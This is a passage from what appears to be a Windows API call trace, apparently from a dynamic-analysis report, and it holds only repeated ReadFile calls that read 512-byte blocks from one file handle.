lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.291] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.292] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.368] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.369] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.370] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.371] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.372] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.373] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.374] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.375] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.376] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, 